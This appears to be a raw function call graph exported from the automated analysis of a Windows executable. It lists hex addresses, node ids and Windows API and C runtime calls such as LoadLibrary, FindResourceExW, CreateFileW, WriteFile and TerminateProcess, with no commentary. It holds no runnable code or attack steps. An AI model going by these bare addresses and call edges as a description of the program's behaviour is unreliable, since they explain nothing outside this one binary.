96335 a75333 21 API calls 3 library calls 96284->96335 96286 a786be 96286->96284 96287 a786f6 96286->96287 96290 a753c4 __wsopen_s 26 API calls 96286->96290 96287->96284 96288 a753c4 __wsopen_s 26 API calls 96287->96288 96292 a78702 CloseHandle 96288->96292 96289 a7871c 96293 a7873e 96289->96293 96336 a6f2a3 20 API calls 2 library calls 96289->96336 96291 a786ed 96290->96291 96294 a753c4 __wsopen_s 26 API calls 96291->96294 96292->96284 96295 a7870e GetLastError 96292->96295 96293->96227 96294->96287 96295->96284 96297->96230 96298->96234 96299->96232 96303 a803d7 96300->96303 96301 a803f2 96301->96247 96303->96301 96313 a6f2d9 20 API calls __dosmaperr 96303->96313 96304 a80416 96314 a727ec 26 API calls ___std_exception_copy 96304->96314 96306 a80421 96306->96247 96307->96243 96308->96245 96309->96251 96310->96246 96311->96250 96312->96256 96313->96304 96314->96306 96315->96261 96321 a72fa6 LeaveCriticalSection 96316->96321 96318 a75331 96318->96265 96319->96266 96320->96260 96321->96318 96323 a753e6 96322->96323 96324 a753d1 96322->96324 96329 a7540b 96323->96329 96339 a6f2c6 20 API calls __dosmaperr 96323->96339 96337 a6f2c6 20 API calls __dosmaperr 96324->96337 96326 a753d6 96338 a6f2d9 20 API calls __dosmaperr 96326->96338 96329->96286 96330 a75416 96340 a6f2d9 20 API calls __dosmaperr 96330->96340 96331 a753de 96331->96286 96333 a7541e 96341 a727ec 26 API calls ___std_exception_copy 96333->96341 96335->96289 96336->96293 96337->96326 96338->96331 96339->96330 96340->96333 96341->96331 96342 a42de3 96343 a42df0 __wsopen_s 96342->96343 96344 a82c2b ___scrt_fastfail 96343->96344 96345 a42e09 96343->96345 96347 a82c47 GetOpenFileNameW 96344->96347 96358 a43aa2 96345->96358 96349 a82c96 96347->96349 96351 a46b57 22 API calls 96349->96351 96353 a82cab 96351->96353 96353->96353 96355 a42e27 96386 a444a8 96355->96386 96416 a81f50 96358->96416 96361 a43ace 96363 a46b57 22 API calls 96361->96363 96362 a43ae9 96422 a4a6c3 96362->96422 96365 a43ada 96363->96365 96418 a437a0 96365->96418 96368 a42da5 96369 a81f50 __wsopen_s 96368->96369 96370 a42db2 GetLongPathNameW 96369->96370 96371 a46b57 22 API calls 96370->96371 96372 a42dda 96371->96372 96373 a43598 96372->96373 96374 a4a961 22 API calls 96373->96374 96375 a435aa 96374->96375 96376 a43aa2 23 API calls 96375->96376 96377 a435b5 96376->96377 96378 a832eb 96377->96378 96379 a435c0 96377->96379 96384 a8330d 96378->96384 96440 a5ce60 41 API calls 96378->96440 96428 a4515f 96379->96428 96385 a435df 96385->96355 96441 a44ecb 96386->96441 96389 a83833 96463 ab2cf9 96389->96463 96390 a44ecb 94 API calls 96392 a444e1 96390->96392 96392->96389 96394 a444e9 96392->96394 96393 a83848 96395 a83869 96393->96395 96396 a8384c 96393->96396 96398 a444f5 96394->96398 96399 a83854 96394->96399 96397 a5fe0b 22 API calls 96395->96397 96507 a44f39 96396->96507 96408 a838ae 96397->96408 96506 a4940c 136 API calls 2 library calls 96398->96506 96513 aada5a 82 API calls 96399->96513 96403 a42e31 96404 a83862 96404->96395 96405 a83a5f 96411 a83a67 96405->96411 96406 a44f39 68 API calls 96406->96411 96408->96405 96408->96411 96413 a49cb3 22 API calls 96408->96413 96489 aa967e 96408->96489 96492 a4a4a1 96408->96492 96500 a43ff7 96408->96500 96514 aa95ad 42 API calls _wcslen 96408->96514 96515 ab0b5a 22 API calls 96408->96515 96411->96406 96516 aa989b 82 API calls __wsopen_s 96411->96516 96413->96408 96417 a43aaf GetFullPathNameW 96416->96417 96417->96361 96417->96362 96419 a437ae 96418->96419 96420 a493b2 22 API calls 96419->96420 96421 a42e12 96420->96421 96421->96368 96423 a4a6d0 96422->96423 96424 a4a6dd 96422->96424 96423->96365 96425 a5fddb 22 API calls 96424->96425 96426 a4a6e7 96425->96426 96427 a5fe0b 22 API calls 96426->96427 96427->96423 96429 a4516e 96428->96429 96433 a4518f __fread_nolock 96428->96433 96431 a5fe0b 22 API calls 96429->96431 96430 a5fddb 22 API calls 96432 a435cc 96430->96432 96431->96433 96434 a435f3 96432->96434 96433->96430 96435 a43605 96434->96435 96439 a43624 __fread_nolock 96434->96439 96437 a5fe0b 22 API calls 96435->96437 96436 a5fddb 22 API calls 96438 a4363b 96436->96438 96437->96439 96438->96385 96439->96436 96440->96378 96517 a44e90 LoadLibraryA 96441->96517 96446 a44ef6 LoadLibraryExW 96525 a44e59 LoadLibraryA 96446->96525 96447 a83ccf 96448 a44f39 68 API calls 96447->96448 96450 a83cd6 96448->96450 96452 a44e59 3 API calls 96450->96452 96454 a83cde 96452->96454 96547 a450f5 96454->96547 96455 a44f20 96455->96454 96456 a44f2c 96455->96456 96458 a44f39 68 API calls 96456->96458 96460 a444cd 96458->96460 96460->96389 96460->96390 96462 a83d05 96464 ab2d15 96463->96464 96465 a4511f 64 API calls 96464->96465 96466 ab2d29 96465->96466 96697 ab2e66 96466->96697 96469 ab2d3f 96469->96393 96470 a450f5 40 API calls 96471 ab2d56 96470->96471 96472 a450f5 40 API calls 96471->96472 96473 ab2d66 96472->96473 96474 a450f5 40 API calls 96473->96474 96475 ab2d81 96474->96475 96476 a450f5 40 API calls 96475->96476 96477 ab2d9c 96476->96477 96478 a4511f 64 API calls 96477->96478 96479 ab2db3 96478->96479 96480 a6ea0c ___std_exception_copy 21 API calls 96479->96480 96481 ab2dba 96480->96481 96482 a6ea0c ___std_exception_copy 21 API calls 96481->96482 96483 ab2dc4 96482->96483 96484 a450f5 40 API calls 96483->96484 96485 ab2dd8 96484->96485 96486 ab28fe 27 API calls 96485->96486 96487 ab2dee 96486->96487 96487->96469 96703 ab22ce 79 API calls 96487->96703 96490 a5fe0b 22 API calls 96489->96490 96491 aa96ae __fread_nolock 96490->96491 96491->96408 96493 a4a52b 96492->96493 96499 a4a4b1 __fread_nolock 96492->96499 96495 a5fe0b 22 API calls 96493->96495 96494 a5fddb 22 API calls 96496 a4a4b8 96494->96496 96495->96499 96497 a5fddb 22 API calls 96496->96497 96498 a4a4d6 96496->96498 96497->96498 96498->96408 96499->96494 96501 a4400a 96500->96501 96503 a440ae 96500->96503 96502 a5fe0b 22 API calls 96501->96502 96504 a4403c 96501->96504 96502->96504 96503->96408 96504->96503 96505 a5fddb 22 API calls 96504->96505 96505->96504 96506->96403 96508 a44f43 96507->96508 96509 a44f4a 96507->96509 96704 a6e678 96508->96704 96511 a44f59 96509->96511 96512 a44f6a FreeLibrary 96509->96512 96511->96399 96512->96511 96513->96404 96514->96408 96515->96408 96516->96411 96518 a44ec6 96517->96518 96519 a44ea8 GetProcAddress 96517->96519 96522 a6e5eb 96518->96522 96520 a44eb8 96519->96520 96520->96518 96521 a44ebf FreeLibrary 96520->96521 96521->96518 96555 a6e52a 96522->96555 96524 a44eea 96524->96446 96524->96447 96526 a44e8d 96525->96526 96527 a44e6e GetProcAddress 96525->96527 96530 a44f80 96526->96530 96528 a44e7e 96527->96528 96528->96526 96529 a44e86 FreeLibrary 96528->96529 96529->96526 96531 a5fe0b 22 API calls 96530->96531 96532 a44f95 96531->96532 96623 a45722 96532->96623 96534 a44fa1 __fread_nolock 96535 a450a5 96534->96535 96536 a83d1d 96534->96536 96546 a44fdc 96534->96546 96626 a442a2 CreateStreamOnHGlobal 96535->96626 96637 ab304d 74 API calls 96536->96637 96539 a83d22 96541 a4511f 64 API calls 96539->96541 96540 a450f5 40 API calls 96540->96546 96542 a83d45 96541->96542 96543 a450f5 40 API calls 96542->96543 96545 a4506e messages 96543->96545 96545->96455 96546->96539 96546->96540 96546->96545 96632 a4511f 96546->96632 96548 a45107 96547->96548 96549 a83d70 96547->96549 96659 a6e8c4 96548->96659 96552 ab28fe 96680 ab274e 96552->96680 96554 ab2919 96554->96462 96557 a6e536 ___DestructExceptionObject 96555->96557 96556 a6e544 96580 a6f2d9 20 API calls __dosmaperr 96556->96580 96557->96556 96559 a6e574 96557->96559 96562 a6e586 96559->96562 96563 a6e579 96559->96563 96560 a6e549 96581 a727ec 26 API calls ___std_exception_copy 96560->96581 96572 a78061 96562->96572 96582 a6f2d9 20 API calls __dosmaperr 96563->96582 96566 a6e58f 96567 a6e595 96566->96567 96568 a6e5a2 96566->96568 96583 a6f2d9 20 API calls __dosmaperr 96567->96583 96584 a6e5d4 LeaveCriticalSection __fread_nolock 96568->96584 96569 a6e554 __wsopen_s 96569->96524 96573 a7806d ___DestructExceptionObject 96572->96573 96585 a72f5e EnterCriticalSection 96573->96585 96575 a7807b 96586 a780fb 96575->96586 96579 a780ac __wsopen_s 96579->96566 96580->96560 96581->96569 96582->96569 96583->96569 96584->96569 96585->96575 96593 a7811e 96586->96593 96587 a78088 96599 a780b7 96587->96599 96588 a78177 96604 a74c7d 96588->96604 96593->96587 96593->96588 96602 a6918d EnterCriticalSection 96593->96602 96603 a691a1 LeaveCriticalSection 96593->96603 96594 a78189 96594->96587 96617 a73405 11 API calls 2 library calls 96594->96617 96596 a781a8 96618 a6918d EnterCriticalSection 96596->96618 96622 a72fa6 LeaveCriticalSection 96599->96622 96601 a780be 96601->96579 96602->96593 96603->96593 96610 a74c8a FindHandlerForForeignException 96604->96610 96605 a74cca 96620 a6f2d9 20 API calls __dosmaperr 96605->96620 96606 a74cb5 RtlAllocateHeap 96608 a74cc8 96606->96608 96606->96610 96611 a729c8 96608->96611 96610->96605 96610->96606 96619 a64ead 7 API calls 2 library calls 96610->96619 96612 a729d3 RtlFreeHeap 96611->96612 96616 a729fc _free 96611->96616 96613 a729e8 96612->96613 96612->96616 96621 a6f2d9 20 API calls __dosmaperr 96613->96621 96615 a729ee GetLastError 96615->96616 96616->96594 96617->96596 96618->96587 96619->96610 96620->96608 96621->96615 96622->96601 96624 a5fddb 22 API calls 96623->96624 96625 a45734 96624->96625 96625->96534 96627 a442bc FindResourceExW 96626->96627 96631 a442d9 96626->96631 96628 a835ba LoadResource 96627->96628 96627->96631 96629 a835cf SizeofResource 96628->96629 96628->96631 96630 a835e3 LockResource 96629->96630 96629->96631 96630->96631 96631->96546 96633 a4512e 96632->96633 96636 a83d90 96632->96636 96638 a6ece3 96633->96638 96637->96539 96641 a6eaaa 96638->96641 96640 a4513c 96640->96546 96642 a6eab6 ___DestructExceptionObject 96641->96642 96643 a6eac2 96642->96643 96644 a6eae8 96642->96644 96654 a6f2d9 20 API calls __dosmaperr 96643->96654 96656 a6918d EnterCriticalSection 96644->96656 96647 a6eac7 96655 a727ec 26 API calls ___std_exception_copy 96647->96655 96648 a6eaf4 96657 a6ec0a 62 API calls 2 library calls 96648->96657 96651 a6eb08 96658 a6eb27 LeaveCriticalSection __fread_nolock 96651->96658 96653 a6ead2 __wsopen_s 96653->96640 96654->96647 96655->96653 96656->96648 96657->96651 96658->96653 96662 a6e8e1 96659->96662 96661 a45118 96661->96552 96663 a6e8ed ___DestructExceptionObject 96662->96663 96664 a6e92d 96663->96664 96666 a6e900 ___scrt_fastfail 96663->96666 96674 a6e925 __wsopen_s 96663->96674 96677 a6918d EnterCriticalSection 96664->96677 96675 a6f2d9 20 API calls __dosmaperr 96666->96675 96667 a6e937 96678 a6e6f8 38 API calls 4 library calls 96667->96678 96670 a6e91a 96676 a727ec 26 API calls ___std_exception_copy 96670->96676 96671 a6e94e 96679 a6e96c LeaveCriticalSection __fread_nolock 96671->96679 96674->96661 96675->96670 96676->96674 96677->96667 96678->96671 96679->96674 96683 a6e4e8 96680->96683 96682 ab275d 96682->96554 96686 a6e469 96683->96686 96685 a6e505 96685->96682 96687 a6e48c 96686->96687 96688 a6e478 96686->96688 96692 a6e488 __alldvrm 96687->96692 96696 a7333f 11 API calls 2 library calls 96687->96696 96694 a6f2d9 20 API calls __dosmaperr 96688->96694 96691 a6e47d 96695 a727ec 26 API calls ___std_exception_copy 96691->96695 96692->96685 96694->96691 96695->96692 96696->96692 96700 ab2e7a 96697->96700 96698 a450f5 40 API calls 96698->96700 96699 ab28fe 27 API calls 96699->96700 96700->96698 96700->96699 96701 ab2d3b 96700->96701 96702 a4511f 64 API calls 96700->96702 96701->96469 96701->96470 96702->96700 96703->96469 96705 a6e684 ___DestructExceptionObject 96704->96705 96706 a6e695 96705->96706 96707 a6e6aa 96705->96707 96717 a6f2d9 20 API calls __dosmaperr 96706->96717 96709 a6e6a5 __wsopen_s 96707->96709 96719 a6918d EnterCriticalSection 96707->96719 96709->96509 96711 a6e69a 96718 a727ec 26 API calls ___std_exception_copy 96711->96718 96712 a6e6c6 96720 a6e602 96712->96720 96715 a6e6d1 96736 a6e6ee LeaveCriticalSection __fread_nolock 96715->96736 96717->96711 96718->96709 96719->96712 96721 a6e624 96720->96721 96722 a6e60f 96720->96722 96728 a6e61f 96721->96728 96739 a6dc0b 96721->96739 96737 a6f2d9 20 API calls __dosmaperr 96722->96737 96725 a6e614 96738 a727ec 26 API calls ___std_exception_copy 96725->96738 96728->96715 96732 a6e646 96756 a7862f 96732->96756 96735 a729c8 _free 20 API calls 96735->96728 96736->96709 96737->96725 96738->96728 96740 a6dc23 96739->96740 96744 a6dc1f 96739->96744 96741 a6d955 __fread_nolock 26 API calls 96740->96741 96740->96744 96742 a6dc43 96741->96742 96771 a759be 62 API calls 5 library calls 96742->96771 96745 a74d7a 96744->96745 96746 a6e640 96745->96746 96747 a74d90 96745->96747 96749 a6d955 96746->96749 96747->96746 96748 a729c8 _free 20 API calls 96747->96748 96748->96746 96750 a6d976 96749->96750 96751 a6d961 96749->96751 96750->96732 96772 a6f2d9 20 API calls __dosmaperr 96751->96772 96753 a6d966 96773 a727ec 26 API calls ___std_exception_copy 96753->96773 96755 a6d971 96755->96732 96757 a78653 96756->96757 96758 a7863e 96756->96758 96760 a7868e 96757->96760 96765 a7867a 96757->96765 96774 a6f2c6 20 API calls __dosmaperr 96758->96774 96779 a6f2c6 20 API calls __dosmaperr 96760->96779 96762 a78643 96775 a6f2d9 20 API calls __dosmaperr 96762->96775 96763 a78693 96780 a6f2d9 20 API calls __dosmaperr 96763->96780 96776 a78607 96765->96776 96768 a7869b 96781 a727ec 26 API calls ___std_exception_copy 96768->96781 96769 a6e64c 96769->96728 96769->96735 96771->96744 96772->96753 96773->96755 96774->96762 96775->96769 96782 a78585 96776->96782 96778 a7862b 96778->96769 96779->96763 96780->96768 96781->96769 96783 a78591 ___DestructExceptionObject 96782->96783 96793 a75147 EnterCriticalSection 96783->96793 96785 a7859f 96786 a785c6 96785->96786 96787 a785d1 96785->96787 96788 a786ae __wsopen_s 29 API calls 96786->96788 96794 a6f2d9 20 API calls __dosmaperr 96787->96794 96790 a785cc 96788->96790 96795 a785fb LeaveCriticalSection __wsopen_s 96790->96795 96792 a785ee __wsopen_s 96792->96778 96793->96785 96794->96790 96795->96792 96796 a93a41 96800 ab10c0 96796->96800 96798 a93a4c 96799 ab10c0 53 API calls 96798->96799 96799->96798 96801 ab10fa 96800->96801 96805 ab10cd 96800->96805 96801->96798 96802 ab10fc 96844 a5fa11 53 API calls 96802->96844 96803 ab1101 96811 a47510 96803->96811 96805->96801 96805->96802 96805->96803 96809 ab10f4 96805->96809 96843 a4b270 39 API calls 96809->96843 96812 a47525 96811->96812 96828 a47522 96811->96828 96813 a4752d 96812->96813 96814 a4755b 96812->96814 96845 a651c6 26 API calls 96813->96845 96818 a8500f 96814->96818 96819 a4756d 96814->96819 96824 a850f6 96814->96824 96816 a4753d 96823 a5fddb 22 API calls 96816->96823 96827 a5fe0b 22 API calls 96818->96827 96833 a85088 96818->96833 96852 a5fb21 51 API calls 96819->96852 96820 a8510e 96820->96820 96825 a47547 96823->96825 96854 a65183 26 API calls 96824->96854 96846 a49cb3 96825->96846 96829 a85058 96827->96829 96834 a46350 96828->96834 96830 a5fddb 22 API calls 96829->96830 96831 a8507f 96830->96831 96832 a49cb3 22 API calls 96831->96832 96832->96833 96853 a5fb21 51 API calls 96833->96853 96835 a46362 96834->96835 96836 a84a51 96834->96836 96855 a46373 96835->96855 96865 a44a88 22 API calls __fread_nolock 96836->96865 96839 a4636e 96839->96801 96840 a84a5b 96841 a84a67 96840->96841 96842 a4a8c7 22 API calls 96840->96842 96842->96841 96843->96801 96844->96803 96845->96816 96847 a49cc2 _wcslen 96846->96847 96848 a5fe0b 22 API calls 96847->96848 96849 a49cea __fread_nolock 96848->96849 96850 a5fddb 22 API calls 96849->96850 96851 a49d00 96850->96851 96851->96828 96852->96816 96853->96824 96854->96820 96856 a463b6 __fread_nolock 96855->96856 96857 a46382 96855->96857 96856->96839 96857->96856 96858 a84a82 96857->96858 96859 a463a9 96857->96859 96860 a5fddb 22 API calls 96858->96860 96866 a4a587 96859->96866 96862 a84a91 96860->96862 96863 a5fe0b 22 API calls 96862->96863 96864 a84ac5 __fread_nolock 96863->96864 96865->96840 96868 a4a59d 96866->96868 96870 a4a598 __fread_nolock 96866->96870 96867 a8f80f 96868->96867 96869 a5fe0b 22 API calls 96868->96869 96869->96870 96870->96856 96871 a41cad SystemParametersInfoW 96872 a92a00 96886 a4d7b0 messages 96872->96886 96873 a4db11 PeekMessageW 96873->96886 96874 a4d807 GetInputState 96874->96873 96874->96886 96875 a91cbe TranslateAcceleratorW 96875->96886 96877 a4db73 TranslateMessage DispatchMessageW 96878 a4db8f PeekMessageW 96877->96878 96878->96886 96879 a4da04 timeGetTime 96879->96886 96880 a4dbaf Sleep 96898 a4dbc0 96880->96898 96881 a92b74 Sleep 96881->96898 96882 a91dda timeGetTime 96991 a5e300 23 API calls 96882->96991 96883 a5e551 timeGetTime 96883->96898 96886->96873 96886->96874 96886->96875 96886->96877 96886->96878 96886->96879 96886->96880 96886->96881 96886->96882 96892 a4d9d5 96886->96892 96900 a4ec40 207 API calls 96886->96900 96904 a4dd50 96886->96904 96911 a4dfd0 96886->96911 96934 a51310 96886->96934 96989 a4bf40 207 API calls 2 library calls 96886->96989 96990 a5edf6 IsDialogMessageW GetClassLongW 96886->96990 96992 ab3a2a 23 API calls 96886->96992 96993 ab359c 82 API calls __wsopen_s 96886->96993 96887 a92c0b GetExitCodeProcess 96889 a92c21 WaitForSingleObject 96887->96889 96890 a92c37 CloseHandle 96887->96890 96889->96886 96889->96890 96890->96898 96891 a92a31 96891->96892 96893 ad29bf GetForegroundWindow 96893->96898 96894 a92ca9 Sleep 96894->96886 96898->96883 96898->96886 96898->96887 96898->96891 96898->96892 96898->96893 96898->96894 96994 ac5658 23 API calls 96898->96994 96995 aae97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96898->96995 96996 aad4dc 47 API calls 96898->96996 96900->96886 96905 a4dd83 96904->96905 96906 a4dd6f 96904->96906 96998 ab359c 82 API calls __wsopen_s 96905->96998 96997 a4d260 207 API calls 2 library calls 96906->96997 96908 a4dd7a 96908->96886 96910 a92f75 96910->96910 96912 a4e010 96911->96912 96929 a4e0dc messages 96912->96929 97001 a60242 5 API calls __Init_thread_wait 96912->97001 96915 a92fca 96917 a4a961 22 API calls 96915->96917 96915->96929 96916 a4a961 22 API calls 96916->96929 96918 a92fe4 96917->96918 97002 a600a3 29 API calls __onexit 96918->97002 96923 a92fee 97003 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96923->97003 96924 a4ec40 207 API calls 96924->96929 96927 a4a8c7 22 API calls 96927->96929 96928 a504f0 22 API calls 96928->96929 96929->96916 96929->96924 96929->96927 96929->96928 96930 a4e3e1 96929->96930 96932 ab359c 82 API calls 96929->96932 96999 a4a81b 41 API calls 96929->96999 97000 a5a308 207 API calls 96929->97000 97004 a60242 5 API calls __Init_thread_wait 96929->97004 97005 a600a3 29 API calls __onexit 96929->97005 97006 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96929->97006 97007 ac47d4 207 API calls 96929->97007 97008 ac68c1 207 API calls 96929->97008 96930->96886 96932->96929 96935 a51376 96934->96935 96936 a517b0 96934->96936 96937 a51390 96935->96937 96938 a96331 96935->96938 97161 a60242 5 API calls __Init_thread_wait 96936->97161 96940 a51940 9 API calls 96937->96940 96941 a9633d 96938->96941 97120 ac709c 96938->97120 96944 a513a0 96940->96944 96941->96886 96943 a517ba 96945 a517fb 96943->96945 96946 a49cb3 22 API calls 96943->96946 96947 a51940 9 API calls 96944->96947 96949 a96346 96945->96949 96951 a5182c 96945->96951 96954 a517d4 96946->96954 96948 a513b6 96947->96948 96948->96945 96950 a513ec 96948->96950 97166 ab359c 82 API calls __wsopen_s 96949->97166 96950->96949 96956 a51408 __fread_nolock 96950->96956 97163 a4aceb 23 API calls messages 96951->97163 97162 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96954->97162 96955 a51839 97164 a5d217 207 API calls 96955->97164 96956->96955 96959 a9636e 96956->96959 96967 a5fddb 22 API calls 96956->96967 96968 a5fe0b 22 API calls 96956->96968 96973 a4ec40 207 API calls 96956->96973 96975 a515c7 messages 96956->96975 96976 a5152f 96956->96976 96978 a963b2 96956->96978 97167 ab359c 82 API calls __wsopen_s 96959->97167 96961 a963d1 97169 ac5745 54 API calls _wcslen 96961->97169 96962 a5153c 96965 a51940 9 API calls 96962->96965 96963 a51872 97165 a5faeb 23 API calls 96963->97165 96966 a51549 96965->96966 96970 a51940 9 API calls 96966->96970 96966->96975 96967->96956 96968->96956 96974 a51563 96970->96974 96971 a5171d 96971->96886 96973->96956 96974->96975 96982 a4a8c7 22 API calls 96974->96982 96975->96963 96977 a51940 9 API calls 96975->96977 96981 a5167b messages 96975->96981 97009 ab744a 96975->97009 97065 ac958b 96975->97065 97068 abf0ec 96975->97068 97077 ace204 96975->97077 97113 ab83da 96975->97113 97116 a46246 96975->97116 97170 ab359c 82 API calls __wsopen_s 96975->97170 96976->96961 96976->96962 96977->96975 97168 ab359c 82 API calls __wsopen_s 96978->97168 96981->96971 97160 a5ce17 22 API calls messages 96981->97160 96982->96975 96989->96886 96990->96886 96991->96886 96992->96886 96993->96886 96994->96898 96995->96898 96996->96898 96997->96908 96998->96910 96999->96929 97000->96929 97001->96915 97002->96923 97003->96929 97004->96929 97005->96929 97006->96929 97007->96929 97008->96929 97010 ab7469 97009->97010 97014 ab7474 97009->97014 97179 a4b567 39 API calls 97010->97179 97012 ab7554 97013 a5fddb 22 API calls 97012->97013 97055 ab76a4 97012->97055 97015 ab7587 97013->97015 97014->97012 97016 a4a961 22 API calls 97014->97016 97018 a5fe0b 22 API calls 97015->97018 97017 ab7495 97016->97017 97019 a4a961 22 API calls 97017->97019 97020 ab7598 97018->97020 97021 ab749e 97019->97021 97022 a46246 CloseHandle 97020->97022 97023 a47510 53 API calls 97021->97023 97024 ab75a3 97022->97024 97025 ab74aa 97023->97025 97026 a4a961 22 API calls 97024->97026 97180 a4525f 22 API calls 97025->97180 97028 ab75ab 97026->97028 97030 a46246 CloseHandle 97028->97030 97029 ab74bf 97031 a46350 22 API calls 97029->97031 97032 ab75b2 97030->97032 97033 ab74f2 97031->97033 97034 a47510 53 API calls 97032->97034 97035 ab754a 97033->97035 97181 aad4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97033->97181 97036 ab75be 97034->97036 97183 a4b567 39 API calls 97035->97183 97038 a46246 CloseHandle 97036->97038 97039 ab75c8 97038->97039 97171 a45745 97039->97171 97041 ab7502 97041->97035 97042 ab7506 97041->97042 97044 a49cb3 22 API calls 97042->97044 97046 ab7513 97044->97046 97182 aad2c1 26 API calls 97046->97182 97047 ab75ea 97184 a453de 27 API calls messages 97047->97184 97048 ab76de GetLastError 97050 ab76f7 97048->97050 97191 a46216 CloseHandle messages 97050->97191 97053 ab751c 97053->97035 97054 ab75f8 97185 a453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97054->97185 97055->96975 97057 ab7645 97058 a5fddb 22 API calls 97057->97058 97060 ab7679 97058->97060 97059 ab75ff 97059->97057 97186 aaccff 97059->97186 97062 a4a961 22 API calls 97060->97062 97063 ab7686 97062->97063 97063->97055 97190 aa417d 22 API calls __fread_nolock 97063->97190 97194 ac7f59 97065->97194 97067 ac959b 97067->96975 97069 a47510 53 API calls 97068->97069 97070 abf126 97069->97070 97287 a49e90 97070->97287 97072 abf136 97073 abf15b 97072->97073 97074 a4ec40 207 API calls 97072->97074 97076 abf15f 97073->97076 97315 a49c6e 22 API calls 97073->97315 97074->97073 97076->96975 97078 a4a961 22 API calls 97077->97078 97079 ace21b 97078->97079 97080 a47510 53 API calls 97079->97080 97081 ace22a 97080->97081 97082 a46270 22 API calls 97081->97082 97083 ace23d 97082->97083 97084 a47510 53 API calls 97083->97084 97085 ace24a 97084->97085 97086 ace2c7 97085->97086 97087 ace262 97085->97087 97088 a47510 53 API calls 97086->97088 97347 a4b567 39 API calls 97087->97347 97090 ace2cc 97088->97090 97092 ace2d9 97090->97092 97093 ace314 97090->97093 97091 ace267 97091->97092 97095 ace280 97091->97095 97350 a49c6e 22 API calls 97092->97350 97096 ace32c 97093->97096 97351 a4b567 39 API calls 97093->97351 97348 a46d25 22 API calls __fread_nolock 97095->97348 97097 ace345 97096->97097 97352 a4b567 39 API calls 97096->97352 97101 a4a8c7 22 API calls 97097->97101 97103 ace35f 97101->97103 97102 ace28d 97104 a46350 22 API calls 97102->97104 97328 aa92c8 97103->97328 97106 ace29b 97104->97106 97349 a46d25 22 API calls __fread_nolock 97106->97349 97108 ace2b4 97109 a46350 22 API calls 97108->97109 97111 ace2c2 97109->97111 97110 ace2e6 97110->96975 97353 a462b5 22 API calls 97111->97353 97357 ab98e3 97113->97357 97115 ab83ea 97115->96975 97117 a46250 97116->97117 97118 a4625f 97116->97118 97117->96975 97118->97117 97119 a46264 CloseHandle 97118->97119 97119->97117 97121 ac70db 97120->97121 97122 ac70f5 97120->97122 97450 ab359c 82 API calls __wsopen_s 97121->97450 97439 ac5689 97122->97439 97126 a4ec40 206 API calls 97127 ac7164 97126->97127 97128 ac71ff 97127->97128 97132 ac71a6 97127->97132 97153 ac70ed 97127->97153 97129 ac7205 97128->97129 97130 ac7253 97128->97130 97451 ab1119 22 API calls 97129->97451 97131 a47510 53 API calls 97130->97131 97130->97153 97133 ac7265 97131->97133 97135 ab0acc 22 API calls 97132->97135 97136 a4aec9 22 API calls 97133->97136 97138 ac71de 97135->97138 97139 ac7289 CharUpperBuffW 97136->97139 97137 ac7228 97452 a4a673 22 API calls 97137->97452 97141 a51310 206 API calls 97138->97141 97143 ac72a3 97139->97143 97141->97153 97142 ac7230 97453 a4bf40 207 API calls 2 library calls 97142->97453 97144 ac72aa 97143->97144 97145 ac72f6 97143->97145 97446 ab0acc 97144->97446 97147 a47510 53 API calls 97145->97147 97148 ac72fe 97147->97148 97454 a5e300 23 API calls 97148->97454 97152 a51310 206 API calls 97152->97153 97153->96941 97154 ac7308 97154->97153 97155 a47510 53 API calls 97154->97155 97156 ac7323 97155->97156 97455 a4a673 22 API calls 97156->97455 97158 ac7333 97456 a4bf40 207 API calls 2 library calls 97158->97456 97160->96981 97161->96943 97162->96945 97163->96955 97164->96963 97165->96963 97166->96975 97167->96975 97168->96975 97169->96974 97170->96975 97172 a4575c CreateFileW 97171->97172 97173 a84035 97171->97173 97176 a4577b 97172->97176 97174 a8403b CreateFileW 97173->97174 97173->97176 97175 a84063 97174->97175 97174->97176 97192 a454c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97175->97192 97176->97047 97176->97048 97178 a8406e 97178->97176 97179->97014 97180->97029 97181->97041 97182->97053 97183->97012 97184->97054 97185->97059 97187 aacd19 WriteFile 97186->97187 97188 aacd0e 97186->97188 97187->97057 97193 aacc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97188->97193 97190->97055 97191->97055 97192->97178 97193->97187 97195 a47510 53 API calls 97194->97195 97196 ac7f90 97195->97196 97218 ac7fd5 messages 97196->97218 97232 ac8cd3 97196->97232 97198 ac8281 97199 ac844f 97198->97199 97204 ac828f 97198->97204 97273 ac8ee4 60 API calls 97199->97273 97202 ac845e 97203 ac846a 97202->97203 97202->97204 97203->97218 97245 ac7e86 97204->97245 97205 a47510 53 API calls 97223 ac8049 97205->97223 97210 ac82c8 97260 a5fc70 97210->97260 97213 ac82e8 97266 ab359c 82 API calls __wsopen_s 97213->97266 97214 ac8302 97267 a463eb 22 API calls 97214->97267 97217 ac82f3 GetCurrentProcess TerminateProcess 97217->97214 97218->97067 97219 ac8311 97268 a46a50 22 API calls 97219->97268 97221 ac832a 97230 ac8352 97221->97230 97269 a504f0 22 API calls 97221->97269 97223->97198 97223->97205 97223->97218 97264 aa417d 22 API calls __fread_nolock 97223->97264 97265 ac851d 42 API calls _strftime 97223->97265 97224 ac84c5 97224->97218 97228 ac84d9 FreeLibrary 97224->97228 97225 ac8341 97270 ac8b7b 75 API calls 97225->97270 97228->97218 97230->97224 97271 a504f0 22 API calls 97230->97271 97272 a4aceb 23 API calls messages 97230->97272 97274 ac8b7b 75 API calls 97230->97274 97233 a4aec9 22 API calls 97232->97233 97234 ac8cee CharLowerBuffW 97233->97234 97275 aa8e54 97234->97275 97238 a4a961 22 API calls 97239 ac8d2a 97238->97239 97282 a46d25 22 API calls __fread_nolock 97239->97282 97241 ac8d3e 97242 a493b2 22 API calls 97241->97242 97244 ac8d48 _wcslen 97242->97244 97243 ac8e5e _wcslen 97243->97223 97244->97243 97283 ac851d 42 API calls _strftime 97244->97283 97246 ac7ea1 97245->97246 97247 ac7eec 97245->97247 97248 a5fe0b 22 API calls 97246->97248 97251 ac9096 97247->97251 97249 ac7ec3 97248->97249 97249->97247 97250 a5fddb 22 API calls 97249->97250 97250->97249 97252 ac92ab messages 97251->97252 97256 ac90ba _strcat _wcslen 97251->97256 97252->97210 97253 a4b567 39 API calls 97253->97256 97254 a4b38f 39 API calls 97254->97256 97255 a4b6b5 39 API calls 